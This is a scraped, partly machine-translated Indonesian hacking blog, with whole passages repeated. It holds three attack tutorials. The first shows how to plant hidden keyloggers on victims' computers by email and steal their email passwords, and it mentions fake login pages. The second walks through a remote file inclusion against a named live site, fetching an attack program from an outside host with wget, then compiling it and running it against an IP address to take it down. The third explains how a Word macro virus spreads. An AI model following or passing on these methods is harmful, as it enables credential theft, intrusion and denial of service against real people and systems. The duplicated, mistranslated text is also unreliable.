You can install these keyloggers just as any other program but these things you must keep in mind. Anda dapat menginstal keyloggers ini sama seperti program lain, tetapi hal ini, Anda harus ingat. While installing, it asks you to set a secret password and a hot key combination. Ketika menginstal, itu akan meminta Anda untuk menetapkan sandi rahasia dan kombinasi tombol. This is because, after installation the keylogger program is completely hidden and the victim can no way identify it. Hal ini karena, setelah instalasi program yang keylogger benar-benar tersembunyi dan korban tidak bisa cara mengidentifikasi itu. So, you need the Hot Key combination and secret password to later unhide the keylogger. Jadi, Anda memerlukan Hot Key kombinasi dan rahasia password untuk kemudian unhide dengan keylogger.
4. 4. Once installed how to get password from it? Setelah diinstal bagaimana mendapatkan password dari itu?
The hacker can open the keylogger program by just pressing the hot keys (which is set during installation) and enter the password. Hacker dapat membuka program keylogger dengan hanya menekan tombol panas (yang diatur selama instalasi) dan masukkan sandi. Now it shows the logs containing every keystroke of the user,where it was pressed, at what time, including screenshots of the activities. These logs contain the password of the victim's email account. Sekarang menunjukkan log berisi setiap keystroke pengguna, di mana ia ditekan, jam berapa, termasuk screenshot dari kegiatan. Log ini berisi password dari account email korban.
5. 5. I don't have physical access to the victim's target computer, what can I do? Saya tidak punya akses fisik ke komputer target korban, apa yang bisa saya lakukan?
It doesn't matter whether or not you have physical access to the victim's computer. Tidak masalah apakah Anda memiliki akses fisik ke komputer korban. Because keyloggers like SniperSpy and Win-Spy offers Remote Installation Feature . Karena keyloggers seperti SniperSpy dan Win-Spy menawarkan Fitur Remote Instalasi. With this feature it is possible to remotely install the keylogger on the victim's PC. Dengan fitur ini adalah mungkin untuk remote menginstal keylogger pada PC korban.
You can attach the keylogger with any file such as image, MS excel file or other programs and send it to the victim via email. Anda dapat memasang keylogger dengan file apa saja seperti image, MS excel file atau program lain dan mengirimkannya ke korban melalui email. When the victim runs the file, it will automatically get installed without his knowledge and start recording every activity on his computer. Ketika korban menjalankan file, maka secara otomatis akan mendapatkan diinstal tanpa pengetahuan dan mulai merekam setiap kegiatan di komputernya. These activities are sent to you by the keylogger software via email or FTP. Kegiatan-kegiatan ini dikirim kepada Anda oleh perangkat lunak keylogger melalui email atau FTP.
6. 6. What is the best way to deploy the keylogger onto remote PC? Apa cara terbaik untuk menyebarkan remote yang keylogger ke PC?
Instead of sending the keylogger as an email attachment, it is recommended that you place the file in .ZIP/.RAR format and upload it to www.hotlinkfiles.com . Alih-alih mengirimkan keylogger sebagai lampiran email, direkomendasikan bahwa Anda menempatkan file dalam .ZIP / .RAR format dan meng-upload ke www.hotlinkfiles.com. After uploading, just send the direct download link to the victim via email. Setelah meng-upload, hanya mengirim link download langsung ke korban melalui email. Once he downloads the file from this link and run it, the keylogger will get installed automatically. Begitu ia mendownload file dari link ini dan menjalankannya, yang keylogger akan terinstal secara otomatis.
7. 7. How can a keylogger hack the Email password? Bagaimana seorang keylogger hack Email sandi?
Hacking an email password using keylogger is as simple as this: You install the keylogger on a Remote PC (or on your local PC). Hacking password email menggunakan keylogger adalah yang sederhana seperti ini: Anda menginstal keylogger pada Remote PC (atau pada PC lokal Anda). The victim is unaware of the presence of the keylogger on his computer. Korban tidak menyadari kehadiran keylogger di komputernya. As usual, he logs into his Email account by typing the username and password. Seperti biasa, ia log ke akun email dengan mengetikkan username dan password. This username and password is recorded and sent to you via Email. Username dan password dicatat dan dikirim kepada Anda melalui Email. Now you have the password of your target email account. Sekarang Anda memiliki password dari account email target Anda.
In case if you install the keylogger on your local PC, you can obtain the recorded email password just by unhiding the keylogger program (use your hot key and password to unhide). Dalam hal jika Anda menginstal keylogger pada PC lokal Anda, Anda bisa mendapatkan password email yang direkam hanya dengan program keylogger unhiding yang (menggunakan kunci panas dan password untuk unhide).
8. 8. Which Keylogger is the best? Keylogger adalah yang terbaik?
I recommend SniperSpy as the best for the following reasons. Saya sarankan SniperSpy sebagai yang terbaik untuk alasan-alasan berikut.
1. SniperSpy is fully compatible with Windows 98/ME/2000/XP/Vista. 1. SniperSpy adalah sepenuhnya kompatibel dengan Windows 98/ME/2000/XP/Vista. But Winspy has known compatible issues with Vista. Tapi Winspy telah mengetahui masalah yang kompatibel dengan Vista. So if your PC or the remote PC runs Vista then Winspy is not recommended. Jadi, jika PC atau PC remote menjalankan Vista maka Winspy tidak dianjurkan.
2. 2. SniperSpy is more reliable than Win-Spy since the logs sent will be received and hosted by SniperSpy servers. SniperSpy lebih dapat diandalkan daripada Win-Spy sejak log dikirim akan diterima dan di-host oleh server SniperSpy. You need not rely on your email account to receive the logs. Anda tidak perlu bergantung pada account email Anda untuk menerima log.
2. 2. Unlike Winspy, Sniperspy doesn't require anything to be installed on your computer. Tidak seperti Winspy, Sniperspy tidak memerlukan apa-apa yang harus diinstal pada komputer Anda. To monitor the remote PC all you have to do is just login to your SniperSpy account from your browser. Untuk memonitor remote PC yang perlu anda lakukan hanyalah login ke account SniperSpy Anda dari browser anda.
3. 3. SniperSpy is more easy to use and faster than Winspy. SniperSpy lebih mudah digunakan dan lebih cepat daripada Winspy.
4. 4. SniperSpy offers better support than WinSpy. SniperSpy menawarkan dukungan yang lebih baik daripada WinSpy.
To get a complete review of SniperSpy please see my new post Which Spy Software to Choose Untuk mendapatkan review SniperSpy lengkap silahkan lihat posting baru saya Yang Spy Software untuk Pilih
Apart from the above mentioned reasons, both SniperSpy and WinSpy stands head-to-head. Terlepas dari alasan-alasan yang disebutkan di atas, baik SniperSpy dan WinSpy berdiri kepala-to-head. However in my opinion it's better to go for SniperSpy since it is the best one. I have tested tons of keyloggers and the only two that stood up were SniperSpy and Winspy. Namun menurut saya lebih baik untuk pergi SniperSpy karena itu adalah yang terbaik. Saya telah diuji ton keyloggers dan hanya dua yang berdiri itu SniperSpy dan Winspy.
So what are you waiting for? Jadi apa yang Anda tunggu? If you're serious to hack an email account then go grab either of the two keyloggers now! Jika Anda serius untuk hack account email kemudian pergi mengambil salah satu dari dua keyloggers sekarang!
For more information on these two softwares visit the following links Untuk informasi lebih lanjut tentang kedua softwares kunjungi link berikut
1. SniperSpy 2. WinSpy 1. SniperSpy 2. WinSpy
NOTE: WHEN YOU USE A KEYLOGGER TO HACK AN EMAIL ACCOUNT IT IS HIGHLY RECOMMENDED TO HIDE YOUR REAL IP ADDRESS. CATATAN: BILA ANDA GUNAKAN UNTUK Hack KeyLogger AN EMAIL ACCOUNT INI SANGAT DISARANKAN UNTUK ANDA SEMBUNYIKAN REAL IP ADDRESS. SO WE RECOMMEND THE FOLLOWING IP HIDING SOFTWARE Jadi kami sarankan BERIKUT IP MENYEMBUNYIKAN SOFTWARE
Hide the IP Menyembunyikan IP
2. 2. OTHER WAYS TO HACK AN EMAIL ACCOUNT LAIN CARA UNTUK Hack AN EMAIL ACCOUNT
The other most commonly used trick to sniff password is using Fake Login Pages. Lain yang paling umum digunakan trik untuk mengendus sandi menggunakan Fake Login Pages. Today, Fake login pages are the most widely used techniques to hack an email account. Hari ini, halaman login palsu yang paling banyak digunakan teknik-hack account email. A Fake Login page is a page that appears exactly as a Login page but once we enter our password there, we end up loosing it. A Fake halaman Login adalah halaman yang muncul tepat sebagai halaman Login, tetapi begitu kita masukkan sandi kita di sana, akhirnya kita kehilangan itu.
Fake login pages are created by many hackers on their sites which appear exactly as Gmail or Yahoo login pages but the entered details(username & pw) are redirected to remote server and we get redirected to some other page. Halaman login palsu yang dibuat oleh banyak hacker di situs mereka yang muncul persis seperti Gmail atau Yahoo halaman login tapi rincian yang dimasukkan (username & pw) yang diarahkan ke remote server dan kita diarahkan ke halaman lain. Many times we ignore this but finally we loose our valuable data. Banyak kali kita mengabaikan hal ini, tapi akhirnya kita kehilangan data yang berharga kami.
However creating a fake login page and taking it online to successfully hack an email account is not an easy job. Namun membuat halaman login palsu dan membawanya online untuk berhasil hack account email bukan pekerjaan mudah. It demands an in depth technical knowledge of HTML and scripting languages like PHP, JSP etc. Ini menuntut pengetahuan teknis mendalam tentang HTML dan bahasa script seperti PHP, JSP dll
I hope this info has helped you. Saya harap info ini telah membantu Anda. Happy Email Hacking! Email Happy Hacking!
THINGS YOU SHOULD KNOW BEFORE PROCEEDING HAL YANG PERLU ANDA KETAHUI SEBELUM PROSIDING
Before you learn the real ways to hack an email, the following are the things you should be aware of. Sebelum Anda mempelajari cara-cara nyata untuk hack email, berikut adalah hal-hal yang Anda harus sadar.
1. 1. There is no ready made software that can hack emails just with a click of a button. Please don't waste your money on such scam softwares. Ada software yang siap pakai bisa hack email hanya dengan sekali klik tombol. Tolong jangan menyia-nyiakan uang Anda pada penipuan seperti softwares.
2. Never trust any hacking services that claims to hack email passwords just for $100 or $200. 2. Jangan pernah percaya apapun layanan hacking yang mengklaim hack email password hanya sebesar $ 100 atau $ 200. Often people get fooled by these services and eventually loose their money with no gain. Sering kali orang bisa tertipu oleh layanan ini dan akhirnya kehilangan uang mereka tanpa keuntungan.
3. 3. With my experience of over 6 years in the field of Hacking and Security, I can tell you that there exists only 2 foolproof methods to hack an email. Dengan pengalaman saya selama 6 tahun di bidang Hacking dan Keamanan, saya dapat memberitahu Anda bahwa terdapat hanya 2 metode sangat mudah untuk hack email. All the other methods are simply scam or don't work. Semua metode lain hanyalah scam atau tidak bekerja. The following are the only 2 foolproof methods that work. Berikut ini adalah hanya 2 metode yang sangat mudah bekerja.
1. 1. EASIEST WAY TO HACK AN EMAIL ACCOUNT Cara termudah untuk Hack AN EMAIL ACCOUNT
Today, with the advent of a program called Keylogger it's just a cakewalk to hack an email account. Hari ini, dengan munculnya sebuah program bernama Keylogger it's just a cakewalk-hack account email. It doesn't matter whether or not you have physical access to the victim's computer. Using a keylogger is the easiest way to hack an email account . Tidak masalah apakah Anda memiliki akses fisik ke komputer korban. Menggunakan keylogger adalah cara termudah untuk hack account email. Any one with a basic knowledge of computer can use the keylogger and within few hours you can hack any email account. Setiap orang dengan pengetahuan dasar tentang komputer dapat menggunakan keylogger dan dalam beberapa jam Anda dapat hack account email apapun.
1. 1. What is a keylogger? Apa itu keylogger?
A keylogger, sometimes called a keystroke logger, key logger, or system monitor, is a small program that monitors each keystroke a user types on a specific computer's keyboard. Sebuah keylogger, kadang-kadang disebut keystroke logger, key logger, atau sistem monitor, adalah sebuah program kecil yang memonitor setiap keystroke pengguna mengetik pada keyboard komputer tertentu. Using a keylogger is the easiest way to hack an email account. Menggunakan keylogger adalah cara termudah untuk hack account email. A keylogger program can be installed just in a few seconds and once installed you are only a step away from getting the victim's password. Sebuah program keylogger dapat diinstal hanya dalam beberapa detik dan sekali terinstal, anda hanya satu langkah menjauh dari mendapatkan password korban.
2. 2. Where is the keylogger program available? Dimana program keylogger tersedia?
A keylogger program is widely available on the internet. Some of the best ones are listed below Sebuah program keylogger tersedia secara luas di internet. Beberapa yang terbaik tercantum di bawah ini
SniperSpy SniperSpy
Win-Spy Win-Spy
3. 3. How to install it? Bagaimana cara menginstalnya?
You can install these keyloggers just as any other program but these things you must keep in mind. Anda dapat menginstal keyloggers ini sama seperti program lain, tetapi hal ini, Anda harus ingat. While installing, it asks you to set a secret password and a hot key combination. Ketika menginstal, itu akan meminta Anda untuk menetapkan sandi rahasia dan kombinasi tombol. This is because, after installation the keylogger program is completely hidden and the victim can no way identify it. Hal ini karena, setelah instalasi program yang keylogger benar-benar tersembunyi dan korban tidak bisa cara mengidentifikasi itu. So, you need the Hot Key combination and secret password to later unhide the keylogger. Jadi, Anda memerlukan Hot Key kombinasi dan rahasia password untuk kemudian unhide dengan keylogger.
4. 4. Once installed how to get password from it? Setelah diinstal bagaimana mendapatkan password dari itu?
The hacker can open the keylogger program by just pressing the hot keys (which is set during installation) and enter the password. Hacker dapat membuka program keylogger dengan hanya menekan tombol panas (yang diatur selama instalasi) dan masukkan sandi. Now it shows the logs containing every keystroke of the user,where it was pressed, at what time, including screenshots of the activities. These logs contain the password of the victim's email account. Sekarang menunjukkan log berisi setiap keystroke pengguna, di mana ia ditekan, jam berapa, termasuk screenshot dari kegiatan. Log ini berisi password dari account email korban.
5. 5. I don't have physical access to the victim's target computer, what can I do? Saya tidak punya akses fisik ke komputer target korban, apa yang bisa saya lakukan?
It doesn't matter whether or not you have physical access to the victim's computer. Tidak masalah apakah Anda memiliki akses fisik ke komputer korban. Because keyloggers like SniperSpy and Win-Spy offers Remote Installation Feature . Karena keyloggers seperti SniperSpy dan Win-Spy menawarkan Fitur Remote Instalasi. With this feature it is possible to remotely install the keylogger on the victim's PC. Dengan fitur ini adalah mungkin untuk remote menginstal keylogger pada PC korban.
You can attach the keylogger with any file such as image, MS excel file or other programs and send it to the victim via email. Anda dapat memasang keylogger dengan file apa saja seperti image, MS excel file atau program lain dan mengirimkannya ke korban melalui email. When the victim runs the file, it will automatically get installed without his knowledge and start recording every activity on his computer. Ketika korban menjalankan file, maka secara otomatis akan mendapatkan diinstal tanpa pengetahuan dan mulai merekam setiap kegiatan di komputernya. These activities are sent to you by the keylogger software via email or FTP. Kegiatan-kegiatan ini dikirim kepada Anda oleh perangkat lunak keylogger melalui email atau FTP.
6. 6. What is the best way to deploy the keylogger onto remote PC? Apa cara terbaik untuk menyebarkan remote yang keylogger ke PC?
Instead of sending the keylogger as an email attachment, it is recommended that you place the file in .ZIP/.RAR format and upload it to www.hotlinkfiles.com . Alih-alih mengirimkan keylogger sebagai lampiran email, direkomendasikan bahwa Anda menempatkan file dalam .ZIP / .RAR format dan meng-upload ke www.hotlinkfiles.com. After uploading, just send the direct download link to the victim via email. Setelah meng-upload, hanya mengirim link download langsung ke korban melalui email. Once he downloads the file from this link and run it, the keylogger will get installed automatically. Begitu ia mendownload file dari link ini dan menjalankannya, yang keylogger akan terinstal secara otomatis.
7. 7. How can a keylogger hack the Email password? Bagaimana seorang keylogger hack Email sandi?
Hacking an email password using keylogger is as simple as this: You install the keylogger on a Remote PC (or on your local PC). Hacking password email menggunakan keylogger adalah yang sederhana seperti ini: Anda menginstal keylogger pada Remote PC (atau pada PC lokal Anda). The victim is unaware of the presence of the keylogger on his computer. Korban tidak menyadari kehadiran keylogger di komputernya. As usual, he logs into his Email account by typing the username and password. Seperti biasa, ia log ke akun email dengan mengetikkan username dan password. This username and password is recorded and sent to you via Email. Username dan password dicatat dan dikirim kepada Anda melalui Email. Now you have the password of your target email account. Sekarang Anda memiliki password dari account email target Anda.
In case if you install the keylogger on your local PC, you can obtain the recorded email password just by unhiding the keylogger program (use your hot key and password to unhide). Dalam hal jika Anda menginstal keylogger pada PC lokal Anda, Anda bisa mendapatkan password email yang direkam hanya dengan program keylogger unhiding yang (menggunakan kunci panas dan password untuk unhide).
8. 8. Which Keylogger is the best? Keylogger adalah yang terbaik?
I recommend SniperSpy as the best for the following reasons. Saya sarankan SniperSpy sebagai yang terbaik untuk alasan-alasan berikut.
1. SniperSpy is fully compatible with Windows 98/ME/2000/XP/Vista. 1. SniperSpy adalah sepenuhnya kompatibel dengan Windows 98/ME/2000/XP/Vista. But Winspy has known compatible issues with Vista. Tapi Winspy telah mengetahui masalah yang kompatibel dengan Vista. So if your PC or the remote PC runs Vista then Winspy is not recommended. Jadi, jika PC atau PC remote menjalankan Vista maka Winspy tidak dianjurkan.
2. 2. SniperSpy is more reliable than Win-Spy since the logs sent will be received and hosted by SniperSpy servers. SniperSpy lebih dapat diandalkan daripada Win-Spy sejak log dikirim akan diterima dan di-host oleh server SniperSpy. You need not rely on your email account to receive the logs. Anda tidak perlu bergantung pada account email Anda untuk menerima log.
2. 2. Unlike Winspy, Sniperspy doesn't require anything to be installed on your computer. Tidak seperti Winspy, Sniperspy tidak memerlukan apa-apa yang harus diinstal pada komputer Anda. To monitor the remote PC all you have to do is just login to your SniperSpy account from your browser. Untuk memonitor remote PC yang perlu anda lakukan hanyalah login ke account SniperSpy Anda dari browser anda.
3. 3. SniperSpy is more easy to use and faster than Winspy. SniperSpy lebih mudah digunakan dan lebih cepat daripada Winspy.
4. 4. SniperSpy offers better support than WinSpy. SniperSpy menawarkan dukungan yang lebih baik daripada WinSpy.
To get a complete review of SniperSpy please see my new post Which Spy Software to Choose Untuk mendapatkan review SniperSpy lengkap silahkan lihat posting baru saya Yang Spy Software untuk Pilih
Apart from the above mentioned reasons, both SniperSpy and WinSpy stands head-to-head. Terlepas dari alasan-alasan yang disebutkan di atas, baik SniperSpy dan WinSpy berdiri kepala-to-head. However in my opinion it's better to go for SniperSpy since it is the best one. I have tested tons of keyloggers and the only two that stood up were SniperSpy and Winspy. Namun menurut saya lebih baik untuk pergi SniperSpy karena itu adalah yang terbaik. Saya telah diuji ton keyloggers dan hanya dua yang berdiri itu SniperSpy dan Winspy.
So what are you waiting for? Jadi apa yang Anda tunggu? If you're serious to hack an email account then go grab either of the two keyloggers now! Jika Anda serius untuk hack account email kemudian pergi mengambil salah satu dari dua keyloggers sekarang!
For more information on these two softwares visit the following links Untuk informasi lebih lanjut tentang kedua softwares kunjungi link berikut
1. SniperSpy 2. WinSpy 1. SniperSpy 2. WinSpy
NOTE: WHEN YOU USE A KEYLOGGER TO HACK AN EMAIL ACCOUNT IT IS HIGHLY RECOMMENDED TO HIDE YOUR REAL IP ADDRESS. CATATAN: BILA ANDA GUNAKAN UNTUK Hack KeyLogger AN EMAIL ACCOUNT INI SANGAT DISARANKAN UNTUK ANDA SEMBUNYIKAN REAL IP ADDRESS. SO WE RECOMMEND THE FOLLOWING IP HIDING SOFTWARE Jadi kami sarankan BERIKUT IP MENYEMBUNYIKAN SOFTWARE
Hide the IP Menyembunyikan IP
2. 2. OTHER WAYS TO HACK AN EMAIL ACCOUNT LAIN CARA UNTUK Hack AN EMAIL ACCOUNT
The other most commonly used trick to sniff password is using Fake Login Pages. Lain yang paling umum digunakan trik untuk mengendus sandi menggunakan Fake Login Pages. Today, Fake login pages are the most widely used techniques to hack an email account. Hari ini, halaman login palsu yang paling banyak digunakan teknik-hack account email. A Fake Login page is a page that appears exactly as a Login page but once we enter our password there, we end up loosing it. A Fake halaman Login adalah halaman yang muncul tepat sebagai halaman Login, tetapi begitu kita masukkan sandi kita di sana, akhirnya kita kehilangan itu.
Fake login pages are created by many hackers on their sites which appear exactly as Gmail or Yahoo login pages but the entered details(username & pw) are redirected to remote server and we get redirected to some other page. Halaman login palsu yang dibuat oleh banyak hacker di situs mereka yang muncul persis seperti Gmail atau Yahoo halaman login tapi rincian yang dimasukkan (username & pw) yang diarahkan ke remote server dan kita diarahkan ke halaman lain. Many times we ignore this but finally we loose our valuable data. Banyak kali kita mengabaikan hal ini, tapi akhirnya kita kehilangan data yang berharga kami.
However creating a fake login page and taking it online to successfully hack an email account is not an easy job. Namun membuat halaman login palsu dan membawanya online untuk berhasil hack account email bukan pekerjaan mudah. It demands an in depth technical knowledge of HTML and scripting languages like PHP, JSP etc. Ini menuntut pengetahuan teknis mendalam tentang HTML dan bahasa script seperti PHP, JSP dll
I hope this info has helped you. Saya harap info ini telah membantu Anda. Happy Email Hacking! Email Happy Hacking!
Friday, May 15, 2009
Tutorial tembak IP Target
penulis [SSA]
mengaggap bahwa temen-temen yang baca tulisan ini sudah bisa menginjek-injek
Target, dan mengerti sedikit tentang pengalamatan IP Address. Karena kalau belum 'biasa' injek, pasti
akan malu-malu dan gugup(xixixixixi) dan tentang Pengalamatan IP Address kalau ga tau sama sekali tentu
target yang akan lo tembak ga' bakal disconnect atau down.
Nah, kalau udah bisa inject dan mengerti sedikit tentang pengalamatan IP, langsung dech...
0o0 Pertama-tama Lo harus punya server yang siap inject [Klo' blom punya cari aja di Google.
th3sn0wbr4in punya nich sedikit target dan Bug-bug yang 'Mudah-mudahan' masih bisa dipake di sini
0o0 Untuk contoh ini gw pake Bug PHPLiveHelper dan Keyword untuk mencari targetnya di Google Gw coba
allinurl:"/PHPLiveHelper/*.php"
0o0 Gw coba salah satu hasil pencarian dari Google, yaitu http://www.maldivesrds.com/phplivehelper/mail.php?
ipadd=219.83.4.68&PHPSESSID=accdc7e62171c549536495c2b40a5dd3&department=1&livename=
0o0 Hapus tulisan /mail.php?ipadd=219.83.4.68&PHPSESSID=accdc7e62171c549536495c2b40a5dd3&department=1&
livename= dan tambahkan Bug dibelakang alamat URL targetnya, sehingga alamat targetnya menjadi
http://www.maldivesrds.com/phplivehelper/initiate.php?abs_path=http://freewebs.com/th3sn0wbr4in/tusuk.htm?
0o0 Nah...bisa di-inject kan...? Kita lihat UID - nya adalah nobody(99), gapapa dech...
0o0 Cari Direktory yang bisa ditulis ama user nobody. Seperti biasa, ketik command linuxnya. Lo bisa ketik
find / -type d -perm 777 atau find / -type d -user nobody nah nanti banyak tuch yang keluar...
/* Maksud dari command 1 di atas adalah untuk mencari dari Directory paling atas '/' tipenya Directory, dengan permisi
777 (rwx) untuk siapapun, termasuk user nobody */
/* Maksud dari command 2 di atas adalah untuk mencari dari Directory paling atas '/' tipenya Directory, milik user nobody.
Karena pemilik Directory bisa melakukan apapun pada Directory miliknya */
Cari dibelakangnya ga' ada tulisan Permission Denied, copy dan paste di paste di Field Directory di PHPShell kamu
dan [Enter]. Kalau semua ada tulisan Permission Denied, coba saja Directory /tmp, karena biasanya bermode 777.
0o0 Download file untuk tembak dengan menggunakan wget. Ketik wget http://freewebs.com/th3sn0wbr4in/tembak.c.
Jika wget tidak bisa digunakan (Command not found atau denied) gunakan lwp-download.
Ketik lwp-download http://freewebs.com/th3sn0wbr4in/tembak.c dan [Enter] aja langsung.
Kalau anda menggunakan wget akan keluar keterangan di PHPShell lo, +- seperti ini :
--02:39:51-- http://freewebs.com/th3sn0wbr4in/tembak.c
=> `tembak.c'
Resolving freewebs.com... 38.119.100.2
Connecting to freewebs.com[38.119.100.2]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3,744 [text/x-csrc]
0K ... 100% 30.89 KB/s
02:39:51 (30.89 KB/s) - `Sambit.c' saved [3764/3764]
Nah, kalau udah muncul tulisan saved berarti udah kedownload filenya...
0o0 Compile file tembak.c tadi biar jadi file Executeable (kalau di WinDo$t Ekstensinya .exe kalau di Linux
tidak menggunakan Ekstensi).
Ketik gcc tembak.c -o tembak
Maksud Command di atas adalah menjalankan gcc, compile file tembak.c (Source Code C) dengan Output
file bernama tembak. Jadi nama tembak bisa lo ganti sesuai selera
0o0 Nah...sekarang, jalankan file tembak tadi. Ketik apa...?
0o0 ./tembak 219.83.4.68 80
0x01 ./ adalah Directory tempat kita menaruh file tembak
0x02 219.83.4.68 IP Warnet tempat gw maen
0x03 80 No Port. 80 untuk HTTP a.k.a Browsing
Untuk apa itu port. Stop tanya terus, buka Google! Cari yang ingin Lo cari!
0o0 Penutup
Akankah kita tetap menjadi anak kecil...? tanpa memberikan penghargaan terhadap penulis...?
atau anda masih berpegang teguh kepada pemikiran anak anak anda dengan merubah identitas
asli penulis dan kemudian mencantumkan nama anda sebagai author disini...?
Kenapa hal ini sering saya sampaikan...? karena Indonesia di mata komunitas IT luar negeri
sering dicap sebagai plagiator dan sering seenaknya mencantumkan kata `author` yang sebenarnya
mereka hanya meng-edit sedikit dari paper yang orang lain tulis, kadangkala mereka sendiri tidak
mengerti apa maksud dibalik tulisan tersebut.
mengaggap bahwa temen-temen yang baca tulisan ini sudah bisa menginjek-injek
Target, dan mengerti sedikit tentang pengalamatan IP Address. Karena kalau belum 'biasa' injek, pasti
akan malu-malu dan gugup(xixixixixi) dan tentang Pengalamatan IP Address kalau ga tau sama sekali tentu
target yang akan lo tembak ga' bakal disconnect atau down.
Nah, kalau udah bisa inject dan mengerti sedikit tentang pengalamatan IP, langsung dech...
0o0 Pertama-tama Lo harus punya server yang siap inject [Klo' blom punya cari aja di Google.
th3sn0wbr4in punya nich sedikit target dan Bug-bug yang 'Mudah-mudahan' masih bisa dipake di sini
0o0 Untuk contoh ini gw pake Bug PHPLiveHelper dan Keyword untuk mencari targetnya di Google Gw coba
allinurl:"/PHPLiveHelper/*.php"
0o0 Gw coba salah satu hasil pencarian dari Google, yaitu http://www.maldivesrds.com/phplivehelper/mail.php?
ipadd=219.83.4.68&PHPSESSID=accdc7e62171c549536495c2b40a5dd3&department=1&livename=
0o0 Hapus tulisan /mail.php?ipadd=219.83.4.68&PHPSESSID=accdc7e62171c549536495c2b40a5dd3&department=1&
livename= dan tambahkan Bug dibelakang alamat URL targetnya, sehingga alamat targetnya menjadi
http://www.maldivesrds.com/phplivehelper/initiate.php?abs_path=http://freewebs.com/th3sn0wbr4in/tusuk.htm?
0o0 Nah...bisa di-inject kan...? Kita lihat UID - nya adalah nobody(99), gapapa dech...
0o0 Cari Direktory yang bisa ditulis ama user nobody. Seperti biasa, ketik command linuxnya. Lo bisa ketik
find / -type d -perm 777 atau find / -type d -user nobody nah nanti banyak tuch yang keluar...
/* Maksud dari command 1 di atas adalah untuk mencari dari Directory paling atas '/' tipenya Directory, dengan permisi
777 (rwx) untuk siapapun, termasuk user nobody */
/* Maksud dari command 2 di atas adalah untuk mencari dari Directory paling atas '/' tipenya Directory, milik user nobody.
Karena pemilik Directory bisa melakukan apapun pada Directory miliknya */
Cari dibelakangnya ga' ada tulisan Permission Denied, copy dan paste di paste di Field Directory di PHPShell kamu
dan [Enter]. Kalau semua ada tulisan Permission Denied, coba saja Directory /tmp, karena biasanya bermode 777.
0o0 Download file untuk tembak dengan menggunakan wget. Ketik wget http://freewebs.com/th3sn0wbr4in/tembak.c.
Jika wget tidak bisa digunakan (Command not found atau denied) gunakan lwp-download.
Ketik lwp-download http://freewebs.com/th3sn0wbr4in/tembak.c dan [Enter] aja langsung.
Kalau anda menggunakan wget akan keluar keterangan di PHPShell lo, +- seperti ini :
--02:39:51-- http://freewebs.com/th3sn0wbr4in/tembak.c
=> `tembak.c'
Resolving freewebs.com... 38.119.100.2
Connecting to freewebs.com[38.119.100.2]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3,744 [text/x-csrc]
0K ... 100% 30.89 KB/s
02:39:51 (30.89 KB/s) - `Sambit.c' saved [3764/3764]
Nah, kalau udah muncul tulisan saved berarti udah kedownload filenya...
0o0 Compile file tembak.c tadi biar jadi file Executeable (kalau di WinDo$t Ekstensinya .exe kalau di Linux
tidak menggunakan Ekstensi).
Ketik gcc tembak.c -o tembak
Maksud Command di atas adalah menjalankan gcc, compile file tembak.c (Source Code C) dengan Output
file bernama tembak. Jadi nama tembak bisa lo ganti sesuai selera
0o0 Nah...sekarang, jalankan file tembak tadi. Ketik apa...?
0o0 ./tembak 219.83.4.68 80
0x01 ./ adalah Directory tempat kita menaruh file tembak
0x02 219.83.4.68 IP Warnet tempat gw maen
0x03 80 No Port. 80 untuk HTTP a.k.a Browsing
Untuk apa itu port. Stop tanya terus, buka Google! Cari yang ingin Lo cari!
0o0 Penutup
Akankah kita tetap menjadi anak kecil...? tanpa memberikan penghargaan terhadap penulis...?
atau anda masih berpegang teguh kepada pemikiran anak anak anda dengan merubah identitas
asli penulis dan kemudian mencantumkan nama anda sebagai author disini...?
Kenapa hal ini sering saya sampaikan...? karena Indonesia di mata komunitas IT luar negeri
sering dicap sebagai plagiator dan sering seenaknya mencantumkan kata `author` yang sebenarnya
mereka hanya meng-edit sedikit dari paper yang orang lain tulis, kadangkala mereka sendiri tidak
mengerti apa maksud dibalik tulisan tersebut.
Tuesday, May 5, 2009
TUTORIAL VIRUS MARCO
Virus Macro
(dijas/mideis)
Virus codenya Bisa lihat Di Sini Ok dech, sekarang kita mulai pembahasannya.
Sebelumnya dikasih tau dulu yach, berhubung virus ini gua yang buat (gabungan dari
berbagai sumber dan ide sendiri), jadi jangan pada protes kalo kebanyakan isinya banyak
nyebutin nama gua :p.
Untuk membuat virus makro diperlukan satu penanda, kalo kalian buat data base
semacam primary key atau NIS (Nomor Induk Siswa) untuk siswa SMU. Pada kasus ini
nama modulnya kita jadikan penanda. Dengan penanda ini kita bisa mengetahui apakah
dokumen tersebut telah terinfeksi atau belum. Pada contoh ini penandanya gua beri nama
DJOK (hayo... tadikan udah dikasih tau jangan protes :d). Ini bisa dilihat pada baris 0.
Kenapa dijadiin komentar? Karena itu untuk mempermudah mengingat saja bahwa
penandanya bernama DJOK, Kalo mau disebarkan sebaiknya dihapus saja.
Baris ke-0 sampai 4 adalah kredit pembuat virusnya. Biasanya ini selalu ada, sekedar
nampang doang biar orang pada tau siapa yang buat ni virus :p. Baris ke-5 hanya spasi
kosong, sebaiknya antar prosedur diberi spasi kosong biar terlihat rapi dan mudah
dipelajari.
Baris 6 sampai 19 adalah tahap penginfeksian dokumen. Prosedurnya diberi nama
InfeksiDokumen. Pada baris ke-7 di deklarasikan variabel UdahAda sebagai boolean dan
diberi nilai false. Fungsi variabel ini untuk mengecek apakah virus tersebut sudah ada di
dalam dokumen. Baris 9 adalah jurus pamungkas yang gua gunain kalo buat program di
vb :d. Walaupun kurang baik tapi sangat manjur untuk beberapa hal. Fungsinya adalah
memaksa program memaksa program mengabaikan kesalahan yang terjadi.
Baris 10 sampai 15 adalah proses looping. Di sini akan dicek setiap objek yang ada di
dokumen aktif. Buat apa di cek? perhatikan baris selanjutnya (baris 11). If obj.Name =
"DJOK" Then UdahAda = True. Di sini diperiksa apakah ada modul/penanda yang
bernama DJOK? Bila ada maka variabel UdahAda diset true. Apasih objek itu? coba
buka microsoft word dan tekan alt+F11, lalu lihat bagian project (biasanya di kiri atas).
Perhatikan gambar, yang dilingkarin itu yang dimaksud objek.
Baris selanjutnya dicek bila ternyata ada objek lain selain DJOK tetapi bukan bernama
ThisDocument. Bila ternyata ada objek lain dan bukan bernama ThisDokument, maka
perintah pada baris 13 akan dijalankan. Apa yang dilakukan pada baris 13 hayoo...?
Seluruh objek yang bukan bernama DJOK dan ThisDocument akan dihapus. Dengan cara
ini bila ada virus makro yang coba-coba masuk bakal dibantai. Kalo virus makronya juga
pake konsep yang sama bagaimana? Yaa.. mereka bakal berantem dan yang menang yang
